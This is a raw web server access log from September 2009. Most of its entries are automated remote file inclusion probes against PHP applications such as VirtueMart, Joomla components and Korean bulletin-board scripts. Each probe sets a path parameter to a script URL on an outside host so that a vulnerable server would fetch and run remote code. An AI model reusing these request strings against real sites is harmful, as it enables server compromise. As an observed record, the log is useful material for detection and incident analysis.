61.135.134.235 - - [24/Sep/2009:03:53:52 -0500] "GET /logs/access_log.1230681600////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.135.134.235 - - [24/Sep/2009:03:53:55 -0500] "GET /logs/access_log.1230768000////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.63.4.74 - - [24/Sep/2009:03:54:18 -0500] "GET ////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
61.63.4.74 - - [24/Sep/2009:03:54:18 -0500] "GET /logs/access_log.1230681600////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:03:54:22 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:03:54:22 -0500] "GET /logs/access_log.1244764800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:03:54:22 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
61.63.4.74 - - [24/Sep/2009:03:54:27 -0500] "GET /logs////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 206243 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:55:33 -0500] "GET /logs/access_log.1250553600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:55:33 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:55:33 -0500] "GET /logs/access_log.1249776000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:03:55:33 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
61.63.4.74 - - [24/Sep/2009:03:58:58 -0500] "GET /logs/access_log.1230681600////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.63.4.74 - - [24/Sep/2009:03:58:58 -0500] "GET ////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
61.63.4.74 - - [24/Sep/2009:03:59:01 -0500] "GET /logs////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 200 206243 "-""Mozilla/5.0"
61.63.4.74 - - [24/Sep/2009:03:59:28 -0500] "GET /logs/access_log.1230768000////?_zb_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
65.55.207.50 - - [24/Sep/2009:03:59:29 -0500] "GET /logs/access_log.1165708800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.155.5.84 - - [24/Sep/2009:04:00:42 -0500] "GET /logs/access_log.1243468800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:04:00:49 -0500] "GET /logs/access_log.1251504000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:04:03:33 -0500] "GET /logs/access_log.1249776000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.115.111.122 - - [24/Sep/2009:04:03:33 -0500] "GET /logs/access_log.1250553600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
94.23.197.26 - - [24/Sep/2009:04:06:00 -0500] "GET /htmltonuke.php?filnavn=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
94.23.197.26 - - [24/Sep/2009:04:06:01 -0500] "GET /htmltonuke.php?filnavn=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.197.26 - - [24/Sep/2009:04:06:01 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.197.26 - - [24/Sep/2009:04:06:01 -0500] "GET /logs/access_log.1243728000/htmltonuke.php?filnavn=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.197.26 - - [24/Sep/2009:04:06:01 -0500] "GET /logs/access_log.1243036800/htmltonuke.php?filnavn=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.197.26 - - [24/Sep/2009:04:06:21 -0500] "GET /logs/access_log.1243036800/htmltonuke.php?filnavn=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 324 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
94.23.197.26 - - [24/Sep/2009:04:06:21 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 302 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
94.23.197.26 - - [24/Sep/2009:04:06:21 -0500] "GET /logs/access_log.1243728000/htmltonuke.php?filnavn=http://www.tank-treff.de/images/back.gif??? HTTP/1.1" 404 324 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
206.225.23.4 - - [24/Sep/2009:04:07:35 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:07:35 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:07:35 -0500] "GET /logs/access_log.1252540800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:07:48 -0500] "GET /logs/access_log.1250726400//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:07:48 -0500] "GET /logs/access_log.1249603200//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:08:27 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:08:27 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:08:27 -0500] "GET /logs/access_log.1243814400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:08:31 -0500] "GET /logs/access_log.1239408000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:04:14:45 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bikepblancas.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:04:14:45 -0500] "GET /logs/access_log.1244764800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bikepblancas.com/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:04:14:45 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bikepblancas.com/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:04:15:27 -0500] "GET /logs/access_log.1249603200//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bikepblancas.com/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.55.207.140 - - [24/Sep/2009:04:15:29 -0500] "GET /logs/access_log.1163635200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.100.5.136 - - [24/Sep/2009:04:17:54 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bikepblancas.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:04:17:54 -0500] "GET /logs/access_log.1244764800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bikepblancas.com/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:04:17:54 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bikepblancas.com/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.100.5.136 - - [24/Sep/2009:04:18:22 -0500] "GET /logs/access_log.1249603200//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bikepblancas.com/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.55.208.133 - - [24/Sep/2009:04:18:51 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [24/Sep/2009:04:18:51 -0500] "GET /logs/access_log.1245369600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
69.73.185.40 - - [24/Sep/2009:04:18:57 -0500] "GET /logs/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:18:57 -0500] "GET /ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:18:57 -0500] "GET /logs/access_log.1250726400/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:01 -0500] "GET /ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:01 -0500] "GET /logs/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:01 -0500] "GET /logs/access_log.1250985600/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:01 -0500] "GET /logs/access_log.1247270400/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:01 -0500] "GET /ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:01 -0500] "GET /logs/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:01 -0500] "GET /logs/access_log.1250726400/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:05 -0500] "GET /logs/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:05 -0500] "GET /ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:05 -0500] "GET /logs/access_log.1250985600/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:05 -0500] "GET /logs/access_log.1247270400/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:07 -0500] "GET /logs/access_log.1252627200/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.73.185.40 - - [24/Sep/2009:04:19:14 -0500] "GET /logs/access_log.1252627200/ggambo7002_board/comment_modify.php?dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
65.55.106.186 - - [24/Sep/2009:04:21:59 -0500] "GET /logs/access_log.1131235200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.78 - - [24/Sep/2009:04:23:30 -0500] "GET /logs/access_log.1185148800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.159 - - [24/Sep/2009:04:26:29 -0500] "GET /logs/access_log.1208908800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.225.23.4 - - [24/Sep/2009:04:27:07 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:27:07 -0500] "GET /logs/access_log.1251331200/phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.23.4 - - [24/Sep/2009:04:27:07 -0500] "GET /phphtml.php?htmlclass_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:28:33 -0500] "GET /logs/access_log.1249689600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:28:33 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:28:39 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 200 206241 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:28:53 -0500] "GET /logs/access_log.1249689600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:28:53 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:29:00 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://Brandon420.fileave.com/ids/id.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:29:02 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 200 106355 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:29:03 -0500] "GET /logs/access_log.1249689600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://Brandon420.fileave.com/ids/id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:29:05 -0500] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:29:05 -0500] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:29:05 -0500] "GET /logs/access_log.1252627200///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:29:08 -0500] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:29:08 -0500] "GET /logs/access_log.1252627200///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:29:09 -0500] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
72.52.230.102 - - [24/Sep/2009:04:29:12 -0500] "GET /logs//skin//happycast//error.php?dir=http://www.kupcnj.com/www/bbs/skin/ggambo6200_music//idmio.txt?%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
72.52.230.102 - - [24/Sep/2009:04:29:13 -0500] "GET //skin//happycast//error.php?dir=http://www.kupcnj.com/www/bbs/skin/ggambo6200_music//idmio.txt?%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
194.112.190.18 - - [24/Sep/2009:04:29:14 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://Brandon420.fileave.com/ids/id.txt??? HTTP/1.1" 200 206241 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:29:17 -0500] "GET /logs/access_log.1249862400///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:29:20 -0500] "GET /logs/access_log.1249862400///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:30:14 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:30:14 -0500] "GET /logs/access_log.1249689600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.112.190.18 - - [24/Sep/2009:04:30:19 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://brandon420.fileave.com/ids/fx29id.txt??? HTTP/1.1" 200 206241 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:31:45 -0500] "GET /logs/access_log.1252627200///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:31:45 -0500] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:31:45 -0500] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.9.63.18 - - [24/Sep/2009:04:32:19 -0500] "GET /logs/access_log.1249862400///skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:04:34:11 -0500] "GET /logs/access_log.1250726400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:04:34:11 -0500] "GET /logs/access_log.1243468800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:04:34:49 -0500] "GET /logs/access_log.1250726400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.39.130.24 - - [24/Sep/2009:04:34:49 -0500] "GET /logs/access_log.1243468800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.internet-partner.ru/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
77.222.40.169 - - [24/Sep/2009:04:35:43 -0500] "GET /logs/access_log.1249862400////skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
77.222.40.169 - - [24/Sep/2009:04:35:43 -0500] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
77.222.40.169 - - [24/Sep/2009:04:35:43 -0500] "GET /logs/access_log.1250035200////skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
77.222.40.169 - - [24/Sep/2009:04:35:43 -0500] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
77.88.31.247 - - [24/Sep/2009:04:36:43 -0500] "GET /logs/access_log.1237075200 HTTP/1.1" 200 241004 "-""Yandex/1.01.001 (compatible; Win16; I)"
122.155.5.84 - - [24/Sep/2009:04:36:47 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:04:36:47 -0500] "GET /logs/access_log.1243468800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:04:36:47 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.155.5.84 - - [24/Sep/2009:04:36:54 -0500] "GET /logs/access_log.1248998400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
210.109.108.146 - - [24/Sep/2009:04:38:07 -0500] "GET //skin//happycast//error.php?dir=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.109.108.146 - - [24/Sep/2009:04:38:28 -0500] "GET /logs//skin//happycast//error.php?dir=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
210.109.108.146 - - [24/Sep/2009:04:38:28 -0500] "GET /logs/access_log.1250899200//skin//happycast//error.php?dir=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
210.109.108.146 - - [24/Sep/2009:04:38:41 -0500] "GET /logs/access_log.1252627200//skin//happycast//error.php?dir=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
69.94.26.167 - - [24/Sep/2009:04:40:03 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.94.26.167 - - [24/Sep/2009:04:40:03 -0500] "GET /logs/include/lib.inc.php?site_path=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
69.94.26.167 - - [24/Sep/2009:04:40:03 -0500] "GET /include/lib.inc.php?site_path=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.94.26.167 - - [24/Sep/2009:04:40:07 -0500] "GET /logs/access_log.1242950400/include/lib.inc.php?site_path=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.94.26.167 - - [24/Sep/2009:04:40:07 -0500] "GET /logs/access_log.1248998400/include/lib.inc.php?site_path=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.94.26.167 - - [24/Sep/2009:04:40:07 -0500] "GET /logs/access_log.1249344000/include/lib.inc.php?site_path=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
69.94.26.167 - - [24/Sep/2009:04:40:18 -0500] "GET /logs/access_log.1229990400/include/lib.inc.php?site_path=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.107.180 - - [24/Sep/2009:04:42:00 -0500] "GET /logs/access_log.1150761600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.234.21.38 - - [24/Sep/2009:04:45:00 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.65"
